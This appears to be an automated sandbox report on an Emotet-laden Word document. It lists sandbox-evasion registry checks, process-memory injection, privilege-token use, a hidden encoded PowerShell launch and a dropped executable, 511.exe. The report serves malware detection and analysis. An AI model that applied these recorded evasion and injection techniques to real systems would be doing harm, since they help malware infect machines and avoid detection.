Analysis
- max time kernel: 25s
- resource: win10v191014
- submitted: 12-12-2019 09:02
Malware Config
Extracted
Extracted
emotet
Signatures
Suspicious behavior: AddClipboardFormatListener (1 IoC)
Processes:
- pid 4924, WINWORD.EXE

Suspicious use of FindShellTrayWindow (1 IoC)
Processes:
- pid 4924, WINWORD.EXE

Suspicious behavior: EnumeratesProcesses (1 IoC)
Processes:
- pid 4580, Powershell.exe

Checks system information in the registry (2 TTPs, 2 IoCs)
System information is often read in order to detect sandboxing environments.
Processes:
- Key value queried: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SystemInformation\SystemProductName
- Key value queried: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SystemInformation\SystemManufacturer

Checks processor information in registry (2 TTPs, 2 IoCs)
Processor information is often read in order to detect sandboxing environments.
Processes:
- Key opened: \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0
- Key value queried: \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz

Enumerates system info in registry (2 TTPs, 3 IoCs)
Processes:
- Key opened: \REGISTRY\MACHINE\Hardware\Description\System\BIOS
- Key value queried: \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily
- Key value queried: \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU

Suspicious use of SetWindowsHookEx (3 IoCs)
Processes:
- pid 4924, WINWORD.EXE
- pid 4344, 511.exe
- pid 4736, 511.exe

Suspicious use of WriteProcessMemory (3 IoCs)
Processes:
- PID 4176 (SppExtComObj.exe) wrote to memory of PID 3692 (SLUI.exe)
- PID 4580 (Powershell.exe) wrote to memory of PID 4344 (511.exe)
- PID 4344 (511.exe) wrote to memory of PID 4736 (511.exe)

Suspicious use of AdjustPrivilegeToken (1 IoC)
Processes:
- pid 4580, Powershell.exe: Token: SeDebugPrivilege

Executes dropped EXE (2 IoCs)
Processes:
- pid 4344, 511.exe
- pid 4736, 511.exe
Processes
- C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
  Command line: "C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\4238fff71c14fe6622197aa629c14f199b8c7195d4d1e2093bcca325ed14b70d.doc" /o ""
  - Suspicious behavior: AddClipboardFormatListener
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SetWindowsHookEx

- C:\Windows\system32\SppExtComObj.exe
  Command line: C:\Windows\system32\SppExtComObj.exe -Embedding
  - Suspicious use of WriteProcessMemory

  - C:\Windows\System32\SLUI.exe (child of SppExtComObj.exe)
    Command line: "C:\Windows\System32\SLUI.exe" RuleId=eeba1977-569e-4571-b639-7623d8bfecc0;Action=AutoActivate;AppId=55c92734-d682-4d71-983e-d6ec3f16059f;SkuId=2de67392-b7a7-462a-b1ca-108dd189f588;NotificationInterval=1440;Trigger=TimerEvent

- C:\Windows\System32\WindowsPowerShell\v1.0\Powershell.exe
  Command line: Powershell -w hidden -en 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
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of WriteProcessMemory
  - Suspicious use of AdjustPrivilegeToken

  - C:\Users\Admin\511.exe (child of Powershell.exe)
    Command line: "C:\Users\Admin\511.exe"
    - Suspicious use of SetWindowsHookEx
    - Suspicious use of WriteProcessMemory
    - Executes dropped EXE

    - C:\Users\Admin\511.exe (child of 511.exe)
      Command line: --a155b853
      - Suspicious use of SetWindowsHookEx
      - Executes dropped EXE
Downloads
- C:\Users\Admin\511.exe
- C:\Users\Admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-634046074-2673730973-2644684987-1000\0f5007522459c86e95ffcc62f32308f1_293fa5bd-edfb-4bba-800e-a7dce3ea3438
- memory/4344-10-0x00000000023A0000-0x00000000023B7000-memory.dmp (Filesize: 92KB)